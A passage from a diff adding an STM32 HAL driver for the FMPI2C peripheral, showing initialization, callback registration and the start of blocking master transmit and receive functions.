Tickstart); +static HAL_StatusTypeDef FMPI2C_WaitOnTXISFlagUntilTimeout(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Timeout, + uint32_t Tickstart); +static HAL_StatusTypeDef FMPI2C_WaitOnRXNEFlagUntilTimeout(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Timeout, + uint32_t Tickstart); +static HAL_StatusTypeDef FMPI2C_WaitOnSTOPFlagUntilTimeout(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Timeout, + uint32_t Tickstart); +static HAL_StatusTypeDef FMPI2C_IsAcknowledgeFailed(FMPI2C_HandleTypeDef *hfmpi2c, uint32_t Timeout, + uint32_t Tickstart); + +/* Private functions to centralize the enable/disable of Interrupts */ +static void FMPI2C_Enable_IRQ(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t InterruptRequest); +static void FMPI2C_Disable_IRQ(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t InterruptRequest); + +/* Private function to treat different error callback */ +static void FMPI2C_TreatErrorCallback(FMPI2C_HandleTypeDef *hfmpi2c); + +/* Private function to flush TXDR register */ +static void FMPI2C_Flush_TXDR(FMPI2C_HandleTypeDef *hfmpi2c); + +/* Private function to handle start, restart or stop a transfer */ +static void FMPI2C_TransferConfig(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t Size, uint32_t Mode, + uint32_t Request); + +/* Private function to Convert Specific options */ +static void FMPI2C_ConvertOtherXferOptions(FMPI2C_HandleTypeDef *hfmpi2c); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup FMPI2C_Exported_Functions FMPI2C Exported Functions + * @{ + */ + +/** @defgroup FMPI2C_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to initialize and + deinitialize the FMPI2Cx peripheral: + + (+) User must Implement HAL_FMPI2C_MspInit() function in which he configures + all related peripherals resources (CLOCK, GPIO, DMA, IT and NVIC ). + + (+) Call the function HAL_FMPI2C_Init() to configure the selected device with + the selected configuration: + (++) Clock Timing + (++) Own Address 1 + (++) Addressing mode (Master, Slave) + (++) Dual Addressing mode + (++) Own Address 2 + (++) Own Address 2 Mask + (++) General call mode + (++) Nostretch mode + + (+) Call the function HAL_FMPI2C_DeInit() to restore the default configuration + of the selected FMPI2Cx peripheral. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the FMPI2C according to the specified parameters + * in the FMPI2C_InitTypeDef and initialize the associated handle. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Init(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Check the FMPI2C handle allocation */ + if (hfmpi2c == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_FMPI2C_ALL_INSTANCE(hfmpi2c->Instance)); + assert_param(IS_FMPI2C_OWN_ADDRESS1(hfmpi2c->Init.OwnAddress1)); + assert_param(IS_FMPI2C_ADDRESSING_MODE(hfmpi2c->Init.AddressingMode)); + assert_param(IS_FMPI2C_DUAL_ADDRESS(hfmpi2c->Init.DualAddressMode)); + assert_param(IS_FMPI2C_OWN_ADDRESS2(hfmpi2c->Init.OwnAddress2)); + assert_param(IS_FMPI2C_OWN_ADDRESS2_MASK(hfmpi2c->Init.OwnAddress2Masks)); + assert_param(IS_FMPI2C_GENERAL_CALL(hfmpi2c->Init.GeneralCallMode)); + assert_param(IS_FMPI2C_NO_STRETCH(hfmpi2c->Init.NoStretchMode)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hfmpi2c->Lock = HAL_UNLOCKED; + +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + /* Init the FMPI2C Callback settings */ + hfmpi2c->MasterTxCpltCallback = HAL_FMPI2C_MasterTxCpltCallback; /* Legacy weak MasterTxCpltCallback */ + hfmpi2c->MasterRxCpltCallback = HAL_FMPI2C_MasterRxCpltCallback; /* Legacy weak MasterRxCpltCallback */ + hfmpi2c->SlaveTxCpltCallback = HAL_FMPI2C_SlaveTxCpltCallback; /* Legacy weak SlaveTxCpltCallback */ + hfmpi2c->SlaveRxCpltCallback = HAL_FMPI2C_SlaveRxCpltCallback; /* Legacy weak SlaveRxCpltCallback */ + hfmpi2c->ListenCpltCallback = HAL_FMPI2C_ListenCpltCallback; /* Legacy weak ListenCpltCallback */ + hfmpi2c->MemTxCpltCallback = HAL_FMPI2C_MemTxCpltCallback; /* Legacy weak MemTxCpltCallback */ + hfmpi2c->MemRxCpltCallback = HAL_FMPI2C_MemRxCpltCallback; /* Legacy weak MemRxCpltCallback */ + hfmpi2c->ErrorCallback = HAL_FMPI2C_ErrorCallback; /* Legacy weak ErrorCallback */ + hfmpi2c->AbortCpltCallback = HAL_FMPI2C_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + hfmpi2c->AddrCallback = HAL_FMPI2C_AddrCallback; /* Legacy weak AddrCallback */ + + if (hfmpi2c->MspInitCallback == NULL) + { + hfmpi2c->MspInitCallback = HAL_FMPI2C_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware : GPIO, CLOCK, CORTEX...etc */ + hfmpi2c->MspInitCallback(hfmpi2c); +#else + /* Init the low level hardware : GPIO, CLOCK, CORTEX...etc */ + HAL_FMPI2C_MspInit(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY; + + /* Disable the selected FMPI2C peripheral */ + __HAL_FMPI2C_DISABLE(hfmpi2c); + + /*---------------------------- FMPI2Cx TIMINGR Configuration ------------------*/ + /* Configure FMPI2Cx: Frequency range */ + hfmpi2c->Instance->TIMINGR = hfmpi2c->Init.Timing & TIMING_CLEAR_MASK; + + /*---------------------------- FMPI2Cx OAR1 Configuration ---------------------*/ + /* Disable Own Address1 before set the Own Address1 configuration */ + hfmpi2c->Instance->OAR1 &= ~FMPI2C_OAR1_OA1EN; + + /* Configure FMPI2Cx: Own Address1 and ack own address1 mode */ + if (hfmpi2c->Init.AddressingMode == FMPI2C_ADDRESSINGMODE_7BIT) + { + hfmpi2c->Instance->OAR1 = (FMPI2C_OAR1_OA1EN | hfmpi2c->Init.OwnAddress1); + } + else /* FMPI2C_ADDRESSINGMODE_10BIT */ + { + hfmpi2c->Instance->OAR1 = (FMPI2C_OAR1_OA1EN | FMPI2C_OAR1_OA1MODE | hfmpi2c->Init.OwnAddress1); + } + + /*---------------------------- FMPI2Cx CR2 Configuration ----------------------*/ + /* Configure FMPI2Cx: Addressing Master mode */ + if (hfmpi2c->Init.AddressingMode == FMPI2C_ADDRESSINGMODE_10BIT) + { + hfmpi2c->Instance->CR2 = (FMPI2C_CR2_ADD10); + } + /* Enable the AUTOEND by default, and enable NACK (should be disable only during Slave process */ + hfmpi2c->Instance->CR2 |= (FMPI2C_CR2_AUTOEND | FMPI2C_CR2_NACK); + + /*---------------------------- FMPI2Cx OAR2 Configuration ---------------------*/ + /* Disable Own Address2 before set the Own Address2 configuration */ + hfmpi2c->Instance->OAR2 &= ~FMPI2C_DUALADDRESS_ENABLE; + + /* Configure FMPI2Cx: Dual mode and Own Address2 */ + hfmpi2c->Instance->OAR2 = (hfmpi2c->Init.DualAddressMode | hfmpi2c->Init.OwnAddress2 | \ + (hfmpi2c->Init.OwnAddress2Masks << 8)); + + /*---------------------------- FMPI2Cx CR1 Configuration ----------------------*/ + /* Configure FMPI2Cx: Generalcall and NoStretch mode */ + hfmpi2c->Instance->CR1 = (hfmpi2c->Init.GeneralCallMode | hfmpi2c->Init.NoStretchMode); + + /* Enable the selected FMPI2C peripheral */ + __HAL_FMPI2C_ENABLE(hfmpi2c); + + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + return HAL_OK; +} + +/** + * @brief DeInitialize the FMPI2C peripheral. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_DeInit(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Check the FMPI2C handle allocation */ + if (hfmpi2c == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_FMPI2C_ALL_INSTANCE(hfmpi2c->Instance)); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY; + + /* Disable the FMPI2C Peripheral Clock */ + __HAL_FMPI2C_DISABLE(hfmpi2c); + +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) + if (hfmpi2c->MspDeInitCallback == NULL) + { + hfmpi2c->MspDeInitCallback = HAL_FMPI2C_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + hfmpi2c->MspDeInitCallback(hfmpi2c); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + HAL_FMPI2C_MspDeInit(hfmpi2c); +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + hfmpi2c->State = HAL_FMPI2C_STATE_RESET; + hfmpi2c->PreviousState = FMPI2C_STATE_NONE; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Release Lock */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; +} + +/** + * @brief Initialize the FMPI2C MSP. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_MspInit(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitialize the FMPI2C MSP. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval None + */ +__weak void HAL_FMPI2C_MspDeInit(FMPI2C_HandleTypeDef *hfmpi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hfmpi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_FMPI2C_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_FMPI2C_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User FMPI2C Callback + * To be used instead of the weak predefined callback + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_FMPI2C_MASTER_TX_COMPLETE_CB_ID Master Tx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_MASTER_RX_COMPLETE_CB_ID Master Rx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_SLAVE_TX_COMPLETE_CB_ID Slave Tx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_SLAVE_RX_COMPLETE_CB_ID Slave Rx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_LISTEN_COMPLETE_CB_ID Listen Complete callback ID + * @arg @ref HAL_FMPI2C_MEM_TX_COMPLETE_CB_ID Memory Tx Transfer callback ID + * @arg @ref HAL_FMPI2C_MEM_RX_COMPLETE_CB_ID Memory Rx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_ERROR_CB_ID Error callback ID + * @arg @ref HAL_FMPI2C_ABORT_CB_ID Abort callback ID + * @arg @ref HAL_FMPI2C_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_FMPI2C_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_RegisterCallback(FMPI2C_HandleTypeDef *hfmpi2c, HAL_FMPI2C_CallbackIDTypeDef CallbackID, + pFMPI2C_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hfmpi2c); + + if (HAL_FMPI2C_STATE_READY == hfmpi2c->State) + { + switch (CallbackID) + { + case HAL_FMPI2C_MASTER_TX_COMPLETE_CB_ID : + hfmpi2c->MasterTxCpltCallback = pCallback; + break; + + case HAL_FMPI2C_MASTER_RX_COMPLETE_CB_ID : + hfmpi2c->MasterRxCpltCallback = pCallback; + break; + + case HAL_FMPI2C_SLAVE_TX_COMPLETE_CB_ID : + hfmpi2c->SlaveTxCpltCallback = pCallback; + break; + + case HAL_FMPI2C_SLAVE_RX_COMPLETE_CB_ID : + hfmpi2c->SlaveRxCpltCallback = pCallback; + break; + + case HAL_FMPI2C_LISTEN_COMPLETE_CB_ID : + hfmpi2c->ListenCpltCallback = pCallback; + break; + + case HAL_FMPI2C_MEM_TX_COMPLETE_CB_ID : + hfmpi2c->MemTxCpltCallback = pCallback; + break; + + case HAL_FMPI2C_MEM_RX_COMPLETE_CB_ID : + hfmpi2c->MemRxCpltCallback = pCallback; + break; + + case HAL_FMPI2C_ERROR_CB_ID : + hfmpi2c->ErrorCallback = pCallback; + break; + + case HAL_FMPI2C_ABORT_CB_ID : + hfmpi2c->AbortCpltCallback = pCallback; + break; + + case HAL_FMPI2C_MSPINIT_CB_ID : + hfmpi2c->MspInitCallback = pCallback; + break; + + case HAL_FMPI2C_MSPDEINIT_CB_ID : + hfmpi2c->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_FMPI2C_STATE_RESET == hfmpi2c->State) + { + switch (CallbackID) + { + case HAL_FMPI2C_MSPINIT_CB_ID : + hfmpi2c->MspInitCallback = pCallback; + break; + + case HAL_FMPI2C_MSPDEINIT_CB_ID : + hfmpi2c->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hfmpi2c); + return status; +} + +/** + * @brief Unregister an FMPI2C Callback + * FMPI2C callback is redirected to the weak predefined callback + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * This parameter can be one of the following values: + * @arg @ref HAL_FMPI2C_MASTER_TX_COMPLETE_CB_ID Master Tx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_MASTER_RX_COMPLETE_CB_ID Master Rx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_SLAVE_TX_COMPLETE_CB_ID Slave Tx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_SLAVE_RX_COMPLETE_CB_ID Slave Rx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_LISTEN_COMPLETE_CB_ID Listen Complete callback ID + * @arg @ref HAL_FMPI2C_MEM_TX_COMPLETE_CB_ID Memory Tx Transfer callback ID + * @arg @ref HAL_FMPI2C_MEM_RX_COMPLETE_CB_ID Memory Rx Transfer completed callback ID + * @arg @ref HAL_FMPI2C_ERROR_CB_ID Error callback ID + * @arg @ref HAL_FMPI2C_ABORT_CB_ID Abort callback ID + * @arg @ref HAL_FMPI2C_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_FMPI2C_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_UnRegisterCallback(FMPI2C_HandleTypeDef *hfmpi2c, HAL_FMPI2C_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hfmpi2c); + + if (HAL_FMPI2C_STATE_READY == hfmpi2c->State) + { + switch (CallbackID) + { + case HAL_FMPI2C_MASTER_TX_COMPLETE_CB_ID : + hfmpi2c->MasterTxCpltCallback = HAL_FMPI2C_MasterTxCpltCallback; /* Legacy weak MasterTxCpltCallback */ + break; + + case HAL_FMPI2C_MASTER_RX_COMPLETE_CB_ID : + hfmpi2c->MasterRxCpltCallback = HAL_FMPI2C_MasterRxCpltCallback; /* Legacy weak MasterRxCpltCallback */ + break; + + case HAL_FMPI2C_SLAVE_TX_COMPLETE_CB_ID : + hfmpi2c->SlaveTxCpltCallback = HAL_FMPI2C_SlaveTxCpltCallback; /* Legacy weak SlaveTxCpltCallback */ + break; + + case HAL_FMPI2C_SLAVE_RX_COMPLETE_CB_ID : + hfmpi2c->SlaveRxCpltCallback = HAL_FMPI2C_SlaveRxCpltCallback; /* Legacy weak SlaveRxCpltCallback */ + break; + + case HAL_FMPI2C_LISTEN_COMPLETE_CB_ID : + hfmpi2c->ListenCpltCallback = HAL_FMPI2C_ListenCpltCallback; /* Legacy weak ListenCpltCallback */ + break; + + case HAL_FMPI2C_MEM_TX_COMPLETE_CB_ID : + hfmpi2c->MemTxCpltCallback = HAL_FMPI2C_MemTxCpltCallback; /* Legacy weak MemTxCpltCallback */ + break; + + case HAL_FMPI2C_MEM_RX_COMPLETE_CB_ID : + hfmpi2c->MemRxCpltCallback = HAL_FMPI2C_MemRxCpltCallback; /* Legacy weak MemRxCpltCallback */ + break; + + case HAL_FMPI2C_ERROR_CB_ID : + hfmpi2c->ErrorCallback = HAL_FMPI2C_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_FMPI2C_ABORT_CB_ID : + hfmpi2c->AbortCpltCallback = HAL_FMPI2C_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + break; + + case HAL_FMPI2C_MSPINIT_CB_ID : + hfmpi2c->MspInitCallback = HAL_FMPI2C_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_FMPI2C_MSPDEINIT_CB_ID : + hfmpi2c->MspDeInitCallback = HAL_FMPI2C_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_FMPI2C_STATE_RESET == hfmpi2c->State) + { + switch (CallbackID) + { + case HAL_FMPI2C_MSPINIT_CB_ID : + hfmpi2c->MspInitCallback = HAL_FMPI2C_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_FMPI2C_MSPDEINIT_CB_ID : + hfmpi2c->MspDeInitCallback = HAL_FMPI2C_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hfmpi2c); + return status; +} + +/** + * @brief Register the Slave Address Match FMPI2C Callback + * To be used instead of the weak HAL_FMPI2C_AddrCallback() predefined callback + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pCallback pointer to the Address Match Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_RegisterAddrCallback(FMPI2C_HandleTypeDef *hfmpi2c, pFMPI2C_AddrCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hfmpi2c); + + if (HAL_FMPI2C_STATE_READY == hfmpi2c->State) + { + hfmpi2c->AddrCallback = pCallback; + } + else + { + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hfmpi2c); + return status; +} + +/** + * @brief UnRegister the Slave Address Match FMPI2C Callback + * Info Ready FMPI2C Callback is redirected to the weak HAL_FMPI2C_AddrCallback() predefined callback + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_UnRegisterAddrCallback(FMPI2C_HandleTypeDef *hfmpi2c) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hfmpi2c); + + if (HAL_FMPI2C_STATE_READY == hfmpi2c->State) + { + hfmpi2c->AddrCallback = HAL_FMPI2C_AddrCallback; /* Legacy weak AddrCallback */ + } + else + { + /* Update the error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hfmpi2c); + return status; +} + +#endif /* USE_HAL_FMPI2C_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup FMPI2C_Exported_Functions_Group2 Input and Output operation functions + * @brief Data transfers functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the FMPI2C data + transfers. + + (#) There are two modes of transfer: + (++) Blocking mode : The communication is performed in the polling mode. + The status of all data processing is returned by the same function + after finishing transfer. + (++) No-Blocking mode : The communication is performed using Interrupts + or DMA. These functions return the status of the transfer startup. + The end of the data processing will be indicated through the + dedicated FMPI2C IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + + (#) Blocking mode functions are : + (++) HAL_FMPI2C_Master_Transmit() + (++) HAL_FMPI2C_Master_Receive() + (++) HAL_FMPI2C_Slave_Transmit() + (++) HAL_FMPI2C_Slave_Receive() + (++) HAL_FMPI2C_Mem_Write() + (++) HAL_FMPI2C_Mem_Read() + (++) HAL_FMPI2C_IsDeviceReady() + + (#) No-Blocking mode functions with Interrupt are : + (++) HAL_FMPI2C_Master_Transmit_IT() + (++) HAL_FMPI2C_Master_Receive_IT() + (++) HAL_FMPI2C_Slave_Transmit_IT() + (++) HAL_FMPI2C_Slave_Receive_IT() + (++) HAL_FMPI2C_Mem_Write_IT() + (++) HAL_FMPI2C_Mem_Read_IT() + (++) HAL_FMPI2C_Master_Seq_Transmit_IT() + (++) HAL_FMPI2C_Master_Seq_Receive_IT() + (++) HAL_FMPI2C_Slave_Seq_Transmit_IT() + (++) HAL_FMPI2C_Slave_Seq_Receive_IT() + (++) HAL_FMPI2C_EnableListen_IT() + (++) HAL_FMPI2C_DisableListen_IT() + (++) HAL_FMPI2C_Master_Abort_IT() + + (#) No-Blocking mode functions with DMA are : + (++) HAL_FMPI2C_Master_Transmit_DMA() + (++) HAL_FMPI2C_Master_Receive_DMA() + (++) HAL_FMPI2C_Slave_Transmit_DMA() + (++) HAL_FMPI2C_Slave_Receive_DMA() + (++) HAL_FMPI2C_Mem_Write_DMA() + (++) HAL_FMPI2C_Mem_Read_DMA() + (++) HAL_FMPI2C_Master_Seq_Transmit_DMA() + (++) HAL_FMPI2C_Master_Seq_Receive_DMA() + (++) HAL_FMPI2C_Slave_Seq_Transmit_DMA() + (++) HAL_FMPI2C_Slave_Seq_Receive_DMA() + + (#) A set of Transfer Complete Callbacks are provided in non Blocking mode: + (++) HAL_FMPI2C_MasterTxCpltCallback() + (++) HAL_FMPI2C_MasterRxCpltCallback() + (++) HAL_FMPI2C_SlaveTxCpltCallback() + (++) HAL_FMPI2C_SlaveRxCpltCallback() + (++) HAL_FMPI2C_MemTxCpltCallback() + (++) HAL_FMPI2C_MemRxCpltCallback() + (++) HAL_FMPI2C_AddrCallback() + (++) HAL_FMPI2C_ListenCpltCallback() + (++) HAL_FMPI2C_ErrorCallback() + (++) HAL_FMPI2C_AbortCpltCallback() + +@endverbatim + * @{ + */ + +/** + * @brief Transmits in master mode an amount of data in blocking mode. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Transmit(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_BUSY, SET, FMPI2C_TIMEOUT_BUSY, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferISR = NULL; + + /* Send Slave Address */ + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, + FMPI2C_GENERATE_START_WRITE); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_GENERATE_START_WRITE); + } + + while (hfmpi2c->XferCount > 0U) + { + /* Wait until TXIS flag is set */ + if (FMPI2C_WaitOnTXISFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + /* Write data to TXDR */ + hfmpi2c->Instance->TXDR = *hfmpi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferCount--; + hfmpi2c->XferSize--; + + if ((hfmpi2c->XferCount != 0U) && (hfmpi2c->XferSize == 0U)) + { + /* Wait until TCR flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_TCR, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, + FMPI2C_NO_STARTSTOP); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_NO_STARTSTOP); + } + } + } + + /* No need to Check TC flag, with AUTOEND mode the stop is automatically generated */ + /* Wait until STOPF flag is set */ + if (FMPI2C_WaitOnSTOPFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Clear Configuration Register 2 */ + FMPI2C_RESET_CR2(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receives in master mode an amount of data in blocking mode. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Master_Receive(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint8_t *pData, + uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_BUSY, SET, FMPI2C_TIMEOUT_BUSY, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MASTER; + 